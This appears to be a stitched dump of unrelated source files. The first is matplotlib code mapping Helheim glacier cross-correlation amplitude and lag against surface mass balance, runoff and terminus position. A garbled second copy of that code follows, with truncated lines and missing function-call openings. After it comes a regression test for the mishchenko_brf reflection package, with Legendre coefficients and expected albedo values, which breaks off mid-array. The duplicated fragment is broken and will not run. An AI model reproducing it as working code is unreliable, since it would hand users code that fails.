                dx=np.mean(np.diff(x_hel)), dy=np.mean(np.diff(y_hel)), vert_exag=5.)

fig, ((ax1, ax2, ax3), (ax4,ax5,ax6)) = plt.subplots(nrows=2,ncols=3, figsize=(12, 8),
                                                     sharex=True, sharey=True,
                                                     gridspec_kw={'wspace':0.01})

## ---- Top row: max cross-correlation amplitude ----------------------------
## Panel 1: catchment surface mass balance (SMB).
ax1.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc1 = ax1.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
                  c=np.asarray(smb_corr_amax)[smb_significance], cmap=div_colors, marker=sig_markers[0],
                  vmin=corrnorm_min, vmax=corrnorm_max)
ax1.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
            c=np.asarray(smb_corr_amax)[np.invert(smb_significance)], cmap=div_colors, marker=sig_markers[1],
            vmin=corrnorm_min, vmax=corrnorm_max)  # different marker for insig values
ax1.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
        ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
        xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
        ylabel='Northing [km]', title='Catchment SMB')

## Panel 2: catchment runoff.
ax2.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc2 = ax2.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
                  c=np.asarray(runoff_corr_amax)[runoff_significance], cmap=div_colors, marker=sig_markers[0],
                  vmin=corrnorm_min, vmax=corrnorm_max)
ax2.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
            c=np.asarray(runoff_corr_amax)[np.invert(runoff_significance)], cmap=div_colors, marker=sig_markers[1],
            vmin=corrnorm_min, vmax=corrnorm_max)  # distinguish insig values
ax2.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
        ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
        xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
        title='Catchment runoff')

## Panel 3: terminus position, with one shared colorbar for the xcorr row.
ax3.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc3 = ax3.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
                  c=np.asarray(terminus_corr_amax)[terminus_significance], cmap=div_colors, marker=sig_markers[0],
                  vmin=corrnorm_min, vmax=corrnorm_max)
ax3.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
            c=np.asarray(terminus_corr_amax)[np.invert(terminus_significance)], cmap=div_colors, marker=sig_markers[1],
            vmin=corrnorm_min, vmax=corrnorm_max)
## set up correctly scaled colorbar - one for all xcorr plots
div3 = make_axes_locatable(ax3)
cax3 = div3.append_axes("right", size="5%", pad=0.1)
cb3 = fig.colorbar(sc3, cax=cax3)
cb3.ax.set_ylabel('AMax. xcorr')
ax3.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
        ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
        xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
        title='Terminus position', aspect=1.)

## ---- Second row: lag (days) at the maximum cross-correlation -------------
## Panel 4: SMB lag.
ax4.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc4 = ax4.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
                  c=np.asarray(smb_lag_amax)[smb_significance], cmap=lag_colors, marker=sig_markers[0],
                  vmin=lagnorm_min, vmax=lagnorm_max)
ax4.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
            c=np.asarray(smb_lag_amax)[np.invert(smb_significance)], cmap=lag_colors, marker=sig_markers[1],
            vmin=lagnorm_min, vmax=lagnorm_max)
ax4.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
        ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
        xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
        xlabel='Easting [km]', ylabel='Northing [km]')

## Panel 5: runoff lag.
ax5.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc5 = ax5.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
                  c=np.asarray(runoff_lag_amax)[runoff_significance], cmap=lag_colors, marker=sig_markers[0],
                  vmin=lagnorm_min, vmax=lagnorm_max)
ax5.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
            c=np.asarray(runoff_lag_amax)[np.invert(runoff_significance)], cmap=lag_colors, marker=sig_markers[1],
            vmin=lagnorm_min, vmax=lagnorm_max)
ax5.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
        ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
        xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
        xlabel='Easting [km]')

## Panel 6: terminus lag, with one shared colorbar for the lag row.
ax6.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc6 = ax6.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
                  c=np.asarray(terminus_lag_amax)[terminus_significance], cmap=lag_colors, marker=sig_markers[0],
                  vmin=lagnorm_min, vmax=lagnorm_max)
ax6.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
            c=np.asarray(terminus_lag_amax)[np.invert(terminus_significance)], cmap=lag_colors, marker=sig_markers[1],
            vmin=lagnorm_min, vmax=lagnorm_max)
## set up correctly scaled colorbar
div6 = make_axes_locatable(ax6)
cax6 = div6.append_axes("right", size="5%", pad=0.1)
cb6 = fig.colorbar(sc6, cax=cax6)
cb6.ax.set_ylabel('Lag [d] at peak xcorr')
cb6.set_ticks([0, 60, 120, 180, 240, 300, 360])
ax6.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
        ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
        xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
        xlabel='Easting [km]', aspect=1.)
# plt.tight_layout()
# plt.show()
# plt.savefig('/Users/lizz/Desktop/20210204-helheim-xcorr_lag_composite') | 58.670886 | 119 | 0.66548 |
div_colors = 'RdBu'
0.3
lag_colors = 'Greens'
lagnorm_min, lagnorm_max = 0, 365
IGGER_SIZE = 14
plt.rc('font', size=SMALL_SIZE)
plt.rc('axes', titlesize=BIGGER_SIZE)
plt.rc('axes', labelsize=MEDIUM_SIZE)
plt.rc('xtick', labelsize=SMALL_SIZE)
plt.rc('ytick', labelsize=SMALL_SIZE)
plt.rc('legend', fontsize=SMALL_SIZE)
plt.rc('figure', titlesize=BIGGER_SIZE)
sig_markers = ['o', 'x']
p=plt.get_cmap('gray'), blend_mode='overlay',
dx=np.mean(np.diff(x_hel)), dy=np.mean(np.diff(y_hel)), vert_exag=5.)
fig, ((ax1, ax2, ax3), (ax4,ax5,ax6)) = plt.subplots(nrows=2,ncols=3, figsize=(12, 8),
sharex=True, sharey=True,
gridspec_kw={'wspace':0.01})
ax1.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc1 = ax1.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
c=np.asarray(smb_corr_amax)[smb_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax1.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
c=np.asarray(smb_corr_amax)[np.invert(smb_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
ylabel='Northing [km]', title='Catchment SMB')
ax2.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc2 = ax2.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
c=np.asarray(runoff_corr_amax)[runoff_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax2.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
c=np.asarray(runoff_corr_amax)[np.invert(runoff_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
title='Catchment runoff')
ax3.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc3 = ax3.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
c=np.asarray(terminus_corr_amax)[terminus_significance], cmap=div_colors, marker=sig_markers[0],
vmin=corrnorm_min, vmax=corrnorm_max)
ax3.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
c=np.asarray(terminus_corr_amax)[np.invert(terminus_significance)], cmap=div_colors, marker=sig_markers[1],
vmin=corrnorm_min, vmax=corrnorm_max)
ght", size="5%", pad=0.1)
cb3 = fig.colorbar(sc3, cax=cax3)
cb3.ax.set_ylabel('AMax. xcorr')
ax3.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
title='Terminus position', aspect=1.)
rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc4 = ax4.scatter(np.asarray(xys)[smb_significance,0], np.asarray(xys)[smb_significance,1],
c=np.asarray(smb_lag_amax)[smb_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax4.scatter(np.asarray(xys)[np.invert(smb_significance),0], np.asarray(xys)[np.invert(smb_significance),1],
c=np.asarray(smb_lag_amax)[np.invert(smb_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]', ylabel='Northing [km]')
ax5.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc5 = ax5.scatter(np.asarray(xys)[runoff_significance,0], np.asarray(xys)[runoff_significance,1],
c=np.asarray(runoff_lag_amax)[runoff_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax5.scatter(np.asarray(xys)[np.invert(runoff_significance),0], np.asarray(xys)[np.invert(runoff_significance),1],
c=np.asarray(runoff_lag_amax)[np.invert(runoff_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]')
ax6.imshow(rgb2, origin='lower', extent=(x_hel[0], x_hel[-1], y_hel[0], y_hel[-1]))
sc6 = ax6.scatter(np.asarray(xys)[terminus_significance,0], np.asarray(xys)[terminus_significance,1],
c=np.asarray(terminus_lag_amax)[terminus_significance], cmap=lag_colors, marker=sig_markers[0],
vmin=lagnorm_min, vmax=lagnorm_max)
ax6.scatter(np.asarray(xys)[np.invert(terminus_significance),0], np.asarray(xys)[np.invert(terminus_significance),1],
c=np.asarray(terminus_lag_amax)[np.invert(terminus_significance)], cmap=lag_colors, marker=sig_markers[1],
vmin=lagnorm_min, vmax=lagnorm_max)
ax6 = div6.append_axes("right", size="5%", pad=0.1)
cb6 = fig.colorbar(sc6, cax=cax6)
cb6.ax.set_ylabel('Lag [d] at peak xcorr')
cb6.set_ticks([0, 60, 120, 180, 240, 300, 360])
ax6.set(xlim=(278000, 320000), xticks=(280000, 300000, 320000),
ylim=(-2590000, -2550000), yticks=(-2590000, -2570000, -2550000),
xticklabels=('280', '300', '320'), yticklabels=('-2590', '-2570', '-2550'),
xlabel='Easting [km]', aspect=1.)
| true | true |
f72eeb8fcef6921a2eaeb55802122ae8eb9fcfcd | 159,724 | py | Python | tests/test_mishchenko_refllib.py | ghislainp/mishchenko_brf | de7fe70730b53f17fb7e7aa9a45f08bf7d97abd1 | [
"MIT"
] | 2 | 2021-12-19T17:43:48.000Z | 2022-01-30T21:08:54.000Z | tests/test_mishchenko_refllib.py | ghislainp/mishchenko_brf | de7fe70730b53f17fb7e7aa9a45f08bf7d97abd1 | [
"MIT"
] | null | null | null | tests/test_mishchenko_refllib.py | ghislainp/mishchenko_brf | de7fe70730b53f17fb7e7aa9a45f08bf7d97abd1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Tests for `mishchenko_brf` package."""
import numpy as np
from mishchenko_brf.lib.refl import brf
def test_brf():
    """Regression test: brf() reproduces the tabulated reference values.

    Runs the reflection code on the Legendre expansion from ``setup()`` and
    checks the plane albedo and the m=1 reflection matrix against the
    reference numbers returned by ``results()``.
    """
    ssalb, _, legendre = setup()
    # brf() receives the zero-padded coefficient array and its padded length.
    _, spherical_albedo, albedo, _, r = brf(ssalb, len(legendre), legendre)

    expected_spherical_albedo, expected_albedo, expected_r1 = results()
    # NOTE(review): spherical_albedo is returned by brf() and by results()
    # but is currently not compared — consider adding an assertion for it.

    np.testing.assert_allclose(albedo, expected_albedo, atol=1e-6, rtol=0)

    # The reference vector holds the lower-triangular entries of the m=1
    # reflection matrix, flattened row by row; rebuild it the same way.
    r1 = np.concatenate([r[1, i, : i + 1] for i in range(r.shape[1])])
    np.testing.assert_allclose(r1, expected_r1, atol=1e-5, rtol=0)
def setup(n_terms=700):
    """Return the single-scattering albedo and padded Legendre expansion.

    The 642 tabulated Legendre coefficients of the phase function are
    zero-padded to ``n_terms`` entries, the array length expected by
    ``mishchenko_brf.lib.refl.brf``.

    NOTE(review): a module-level ``setup()`` also acts as a nose-style
    pytest hook and may be invoked automatically before each test; the
    default argument keeps that call harmless, but renaming (with its
    caller) would be cleaner — confirm with the test runner in use.

    Parameters
    ----------
    n_terms : int, optional
        Length of the padded coefficient array (default 700; must be at
        least the number of tabulated coefficients, 642).

    Returns
    -------
    tuple
        ``(ssalb, n_coef, padded_coef)``: the single-scattering albedo,
        the count of tabulated (non-padded) coefficients, and a numpy
        array of length ``n_terms``.
    """
    ssalb = 0.85404045e00
    # 642 tabulated Legendre coefficients of the phase-function expansion.
    Legendre_coef = [
        0.1000000e01, 0.2512562e01, 0.3759305e01, 0.4408389e01, 0.5536463e01, 0.6260982e01,
        0.7525636e01, 0.8312788e01, 0.9542491e01, 0.1040885e02, 0.1151645e02, 0.1244280e02,
        0.1343854e02, 0.1442002e02, 0.1533074e02, 0.1628946e02, 0.1717182e02, 0.1807816e02,
        0.1898665e02, 0.1978204e02, 0.2073036e02, 0.2142049e02, 0.2241713e02, 0.2301598e02,
        0.2401247e02, 0.2456069e02, 0.2552589e02, 0.2607232e02, 0.2695832e02, 0.2752722e02,
        0.2831653e02, 0.2892665e02, 0.2962000e02, 0.3025463e02, 0.3086891e02, 0.3150598e02,
        0.3207453e02, 0.3268248e02, 0.3323146e02, 0.3378450e02, 0.3433640e02, 0.3482245e02,
        0.3538333e02, 0.3580127e02, 0.3636525e02, 0.3672771e02, 0.3728034e02, 0.3760455e02,
        0.3812729e02, 0.3843143e02, 0.3890899e02, 0.3920687e02, 0.3962926e02, 0.3992750e02,
        0.4029233e02, 0.4059085e02, 0.4090206e02, 0.4119521e02, 0.4146075e02, 0.4174035e02,
        0.4196960e02, 0.4222747e02, 0.4242858e02, 0.4265858e02, 0.4283710e02, 0.4303618e02,
        0.4319451e02, 0.4336267e02, 0.4350045e02, 0.4364008e02, 0.4375514e02, 0.4386992e02,
        0.4395939e02, 0.4405318e02, 0.4411450e02, 0.4419058e02, 0.4422209e02, 0.4428264e02,
        0.4428387e02, 0.4432995e02, 0.4430155e02, 0.4433324e02, 0.4427669e02, 0.4429349e02,
        0.4421068e02, 0.4421187e02, 0.4410481e02, 0.4408970e02, 0.4396023e02, 0.4392847e02,
        0.4377812e02, 0.4372965e02, 0.4355963e02, 0.4349478e02, 0.4330600e02, 0.4322534e02,
        0.4301853e02, 0.4292279e02, 0.4269857e02, 0.4258853e02, 0.4234756e02, 0.4222396e02,
        0.4196694e02, 0.4183048e02, 0.4155822e02, 0.4140946e02, 0.4112286e02, 0.4096230e02,
        0.4066235e02, 0.4049042e02, 0.4017813e02, 0.3999523e02, 0.3967166e02, 0.3947818e02,
        0.3914435e02, 0.3894071e02, 0.3859761e02, 0.3838426e02, 0.3803282e02, 0.3781024e02,
        0.3745135e02, 0.3722008e02, 0.3685457e02, 0.3661513e02, 0.3624382e02, 0.3599677e02,
        0.3562045e02, 0.3536629e02, 0.3498576e02, 0.3472502e02, 0.3434105e02, 0.3407421e02,
        0.3368756e02, 0.3341511e02, 0.3302651e02, 0.3274894e02, 0.3235911e02, 0.3207689e02,
        0.3168649e02, 0.3140011e02, 0.3100977e02, 0.3071973e02, 0.3033004e02, 0.3003681e02,
        0.2964833e02, 0.2935240e02, 0.2896567e02, 0.2866749e02, 0.2828303e02, 0.2798304e02,
        0.2760134e02, 0.2729996e02, 0.2692148e02, 0.2661913e02, 0.2624432e02, 0.2594138e02,
        0.2557065e02, 0.2526752e02, 0.2490123e02, 0.2459831e02, 0.2423680e02, 0.2393445e02,
        0.2357803e02, 0.2327663e02, 0.2292556e02, 0.2262546e02, 0.2228000e02, 0.2198153e02,
        0.2164193e02, 0.2134540e02, 0.2101185e02, 0.2071756e02, 0.2039027e02, 0.2009849e02,
        0.1977763e02, 0.1948862e02, 0.1917433e02, 0.1888834e02, 0.1858075e02, 0.1829802e02,
        0.1799722e02, 0.1771798e02, 0.1742405e02, 0.1714851e02, 0.1686151e02, 0.1658986e02,
        0.1630983e02, 0.1604226e02, 0.1576923e02, 0.1550590e02, 0.1523988e02, 0.1498093e02,
        0.1472193e02, 0.1446749e02, 0.1421550e02, 0.1396569e02, 0.1372068e02, 0.1347561e02,
        0.1323754e02, 0.1299730e02, 0.1276613e02, 0.1253080e02, 0.1230645e02, 0.1207611e02,
        0.1185852e02, 0.1163322e02, 0.1142231e02, 0.1120210e02, 0.1099778e02, 0.1078270e02,
        0.1058487e02, 0.1037494e02, 0.1018351e02, 0.9978738e01, 0.9793600e01, 0.9593997e01,
        0.9415044e01, 0.9220600e01, 0.9047715e01, 0.8858418e01, 0.8691482e01, 0.8507312e01,
        0.8346198e01, 0.8167129e01, 0.8011710e01, 0.7837708e01, 0.7687854e01, 0.7518876e01,
        0.7374456e01, 0.7210453e01, 0.7071336e01, 0.6912254e01, 0.6778307e01, 0.6624084e01,
        0.6495174e01, 0.6345745e01, 0.6221738e01, 0.6077033e01, 0.5957794e01, 0.5817740e01,
        0.5703134e01, 0.5567654e01, 0.5457548e01, 0.5326563e01, 0.5220821e01, 0.5094248e01,
        0.4992739e01, 0.4870492e01, 0.4773085e01, 0.4655075e01, 0.4561642e01, 0.4447778e01,
        0.4358190e01, 0.4248381e01, 0.4162514e01, 0.4056666e01, 0.3974395e01, 0.3872413e01,
        0.3793618e01, 0.3695406e01, 0.3619966e01, 0.3525429e01, 0.3453228e01, 0.3362271e01,
        0.3293193e01, 0.3205718e01, 0.3139651e01, 0.3055564e01, 0.2992397e01, 0.2911601e01,
        0.2851228e01, 0.2773628e01, 0.2715944e01, 0.2641446e01, 0.2586348e01, 0.2514857e01,
        0.2462248e01, 0.2393671e01, 0.2343453e01, 0.2277698e01, 0.2229778e01, 0.2166754e01,
        0.2121041e01, 0.2060659e01, 0.2017065e01, 0.1959237e01, 0.1917674e01, 0.1862314e01,
        0.1822700e01, 0.1769722e01, 0.1731977e01, 0.1681298e01, 0.1645344e01, 0.1596882e01,
        0.1562643e01, 0.1516319e01, 0.1483723e01, 0.1439458e01, 0.1408435e01, 0.1366152e01,
        0.1336633e01, 0.1296260e01, 0.1268180e01, 0.1229642e01, 0.1202937e01, 0.1166165e01,
        0.1140775e01, 0.1105699e01, 0.1081566e01, 0.1048119e01, 0.1025186e01, 0.9933033e00,
        0.9715168e00, 0.9411347e00, 0.9204422e00, 0.8914999e00, 0.8718511e00, 0.8442892e00,
        0.8256361e00, 0.7993970e00, 0.7816934e00, 0.7567216e00, 0.7399231e00, 0.7161648e00,
        0.7002287e00, 0.6776319e00, 0.6625175e00, 0.6410319e00, 0.6267001e00, 0.6062772e00,
        0.5926905e00, 0.5732835e00, 0.5604061e00, 0.5419698e00, 0.5297674e00, 0.5122584e00,
        0.5006981e00, 0.4840745e00, 0.4731249e00, 0.4573463e00, 0.4469774e00, 0.4320051e00,
        0.4221882e00, 0.4079849e00, 0.3986924e00, 0.3852225e00, 0.3764283e00, 0.3636572e00,
        0.3553362e00, 0.3432310e00, 0.3353594e00, 0.3238883e00, 0.3164434e00, 0.3055761e00,
        0.2985361e00, 0.2882435e00, 0.2815877e00, 0.2718419e00, 0.2655505e00, 0.2563248e00,
        0.2503791e00, 0.2416479e00, 0.2360299e00, 0.2277687e00, 0.2224615e00, 0.2146470e00,
        0.2096341e00, 0.2022440e00, 0.1975101e00, 0.1905229e00, 0.1860533e00, 0.1794487e00,
        0.1752294e00, 0.1689879e00, 0.1650056e00, 0.1591086e00, 0.1553506e00, 0.1497804e00,
        0.1462348e00, 0.1409744e00, 0.1376297e00, 0.1326632e00, 0.1295086e00, 0.1248204e00,
        0.1218456e00, 0.1174212e00, 0.1146165e00, 0.1104419e00, 0.1077980e00, 0.1038600e00,
        0.1013680e00, 0.9765404e-01, 0.9530568e-01, 0.9180371e-01, 0.8959107e-01, 0.8628968e-01,
        0.8420526e-01, 0.8109362e-01, 0.7913032e-01, 0.7619812e-01, 0.7434919e-01, 0.7158666e-01,
        0.6984571e-01, 0.6724356e-01, 0.6560456e-01, 0.6315396e-01, 0.6161117e-01, 0.5930377e-01,
        0.5785177e-01, 0.5567961e-01, 0.5431328e-01, 0.5226885e-01, 0.5098332e-01, 0.4905947e-01,
        0.4785016e-01, 0.4604013e-01, 0.4490269e-01, 0.4320006e-01, 0.4213037e-01, 0.4052908e-01,
        0.3952327e-01, 0.3801755e-01, 0.3707194e-01, 0.3565637e-01, 0.3476748e-01, 0.3343689e-01,
        0.3260145e-01, 0.3135097e-01, 0.3056588e-01, 0.2939089e-01, 0.2865322e-01, 0.2754936e-01,
        0.2685635e-01, 0.2581950e-01, 0.2516853e-01, 0.2419479e-01, 0.2358340e-01, 0.2266910e-01,
        0.2209496e-01, 0.2123660e-01, 0.2069752e-01, 0.1989183e-01, 0.1938574e-01, 0.1862960e-01,
        0.1815454e-01, 0.1744504e-01, 0.1699918e-01, 0.1633353e-01, 0.1591513e-01, 0.1529073e-01,
        0.1489815e-01, 0.1431255e-01, 0.1394424e-01, 0.1339511e-01, 0.1304962e-01, 0.1253477e-01,
        0.1221073e-01, 0.1172810e-01, 0.1142421e-01, 0.1097185e-01, 0.1068691e-01, 0.1026299e-01,
        0.9995839e-02, 0.9598632e-02, 0.9348197e-02, 0.8976075e-02, 0.8741341e-02, 0.8392774e-02,
        0.8172784e-02, 0.7846332e-02, 0.7640186e-02, 0.7334491e-02, 0.7141344e-02, 0.6855129e-02,
        0.6674184e-02, 0.6406246e-02, 0.6236754e-02, 0.5985964e-02, 0.5827218e-02, 0.5592512e-02,
        0.5443850e-02, 0.5224227e-02, 0.5085025e-02, 0.4879544e-02, 0.4749216e-02, 0.4556995e-02,
        0.4434989e-02, 0.4255197e-02, 0.4140997e-02, 0.3972854e-02, 0.3865974e-02, 0.3708747e-02,
        0.3608730e-02, 0.3461733e-02, 0.3368151e-02, 0.3230736e-02, 0.3143185e-02, 0.3014746e-02,
        0.2932847e-02, 0.2812813e-02, 0.2736210e-02, 0.2624045e-02, 0.2552404e-02, 0.2447605e-02,
        0.2380611e-02, 0.2282708e-02, 0.2220067e-02, 0.2128618e-02, 0.2070056e-02, 0.1984648e-02,
        0.1929906e-02, 0.1850152e-02, 0.1798987e-02, 0.1724522e-02, 0.1676708e-02, 0.1607190e-02,
        0.1562511e-02, 0.1497620e-02, 0.1455875e-02, 0.1395308e-02, 0.1356308e-02, 0.1299785e-02,
        0.1263353e-02, 0.1210611e-02, 0.1176583e-02, 0.1127375e-02, 0.1095598e-02, 0.1049696e-02,
        0.1020025e-02, 0.9772121e-03, 0.9495118e-03, 0.9095846e-03, 0.8837259e-03, 0.8464937e-03,
        0.8223557e-03, 0.7876397e-03, 0.7651098e-03, 0.7327438e-03, 0.7117181e-03, 0.6815480e-03,
        0.6619300e-03, 0.6338120e-03, 0.6155113e-03, 0.5893102e-03, 0.5722408e-03, 0.5478283e-03,
        0.5319081e-03, 0.5091634e-03, 0.4943152e-03, 0.4731258e-03, 0.4592787e-03, 0.4395410e-03,
        0.4266303e-03, 0.4082493e-03, 0.3962155e-03, 0.3791019e-03, 0.3678880e-03, 0.3519565e-03,
        0.3415071e-03, 0.3266762e-03, 0.3169383e-03, 0.3031319e-03, 0.2940574e-03, 0.2812067e-03,
        0.2727531e-03, 0.2607960e-03, 0.2529247e-03, 0.2418025e-03, 0.2344753e-03, 0.2241307e-03,
        0.2173091e-03, 0.2076865e-03, 0.2013343e-03, 0.1923831e-03, 0.1864691e-03, 0.1781456e-03,
        0.1726433e-03, 0.1649075e-03, 0.1597912e-03, 0.1526032e-03, 0.1478454e-03, 0.1411648e-03,
        0.1367381e-03, 0.1305278e-03, 0.1264096e-03, 0.1206392e-03, 0.1168121e-03, 0.1114548e-03,
        0.1079011e-03, 0.1029286e-03, 0.9962750e-04, 0.9500928e-04, 0.9194008e-04, 0.8765030e-04,
        0.8479853e-04, 0.8081775e-04, 0.7817267e-04, 0.7448255e-04, 0.7203030e-04, 0.6860758e-04,
        0.6633051e-04, 0.6315326e-04, 0.6103854e-04, 0.5809158e-04, 0.5613237e-04, 0.5340456e-04,
        0.5159216e-04, 0.4906537e-04, 0.4738409e-04, 0.4504024e-04, 0.4348066e-04, 0.4130949e-04,
        0.3986734e-04, 0.3786116e-04, 0.3653038e-04, 0.3467413e-04, 0.3343939e-04, 0.3171734e-04,
        0.3057505e-04, 0.2898660e-04, 0.2793625e-04, 0.2646920e-04, 0.2549635e-04, 0.2413735e-04,
        0.2323900e-04, 0.2198645e-04, 0.2116049e-04, 0.2000504e-04, 0.1924253e-04, 0.1817554e-04,
        0.1747326e-04, 0.1649066e-04, 0.1584529e-04, 0.1494019e-04, 0.1434660e-04, 0.1351308e-04,
        0.1296814e-04, 0.1220153e-04, 0.1170191e-04, 0.1099720e-04, 0.1053953e-04, 0.9892289e-05,
    ]
    return (
        ssalb,
        len(Legendre_coef),
        # Zero-pad on the right up to the length brf() expects.
        np.pad(Legendre_coef, (0, n_terms - len(Legendre_coef))),
    )
def results():
spherical_albedo = 0.1400516239529828
albedo = [
0.57934552e00,
0.55945677e00,
0.53431237e00,
0.50788230e00,
0.48296762e00,
0.46127653e00,
0.44329438e00,
0.42849159e00,
0.41589457e00,
0.40462923e00,
0.39412692e00,
0.38407087e00,
0.37428829e00,
0.36468229e00,
0.35519615e00,
0.34579977e00,
0.33647874e00,
0.32722980e00,
0.31805637e00,
0.30896705e00,
0.29997292e00,
0.29108667e00,
0.28232241e00,
0.27369434e00,
0.26521713e00,
0.25690463e00,
0.24876949e00,
0.24082196e00,
0.23306957e00,
0.22551830e00,
0.21817389e00,
0.21104220e00,
0.20412904e00,
0.19744009e00,
0.19098036e00,
0.18475346e00,
0.17876221e00,
0.17300782e00,
0.16749054e00,
0.16220950e00,
0.15716265e00,
0.15234718e00,
0.14775957e00,
0.14339539e00,
0.13924994e00,
0.13531761e00,
0.13159263e00,
0.12806895e00,
0.12473993e00,
0.12159910e00,
0.11863959e00,
0.11585440e00,
0.11323670e00,
0.11077949e00,
0.10847593e00,
0.10631904e00,
0.10430222e00,
0.10241879e00,
0.10066233e00,
0.99026598e-01,
0.97505502e-01,
0.96093059e-01,
0.94783649e-01,
0.93571737e-01,
0.92452131e-01,
0.91419615e-01,
0.90469383e-01,
0.89596771e-01,
0.88797286e-01,
0.88066630e-01,
0.87400697e-01,
0.86795583e-01,
0.86247541e-01,
0.85752994e-01,
0.85308485e-01,
0.84910698e-01,
0.84556349e-01,
0.84242381e-01,
0.83965667e-01,
0.83723314e-01,
0.83512425e-01,
0.83330259e-01,
0.83174184e-01,
0.83041623e-01,
0.82930155e-01,
0.82837544e-01,
0.82761563e-01,
0.82700156e-01,
0.82651392e-01,
0.82613394e-01,
0.82584500e-01,
0.82563184e-01,
0.82548007e-01,
0.82537644e-01,
0.82530975e-01,
0.82526997e-01,
0.82524881e-01,
0.82523920e-01,
0.82523584e-01,
0.82523517e-01,
]
expected_r1 = np.array(
[
0.38368369e03,
0.25770578e03,
0.23945151e03,
0.16855780e03,
0.18244296e03,
0.16236093e03,
0.10911653e03,
0.12755070e03,
0.12647316e03,
0.10830920e03,
0.67582947e02,
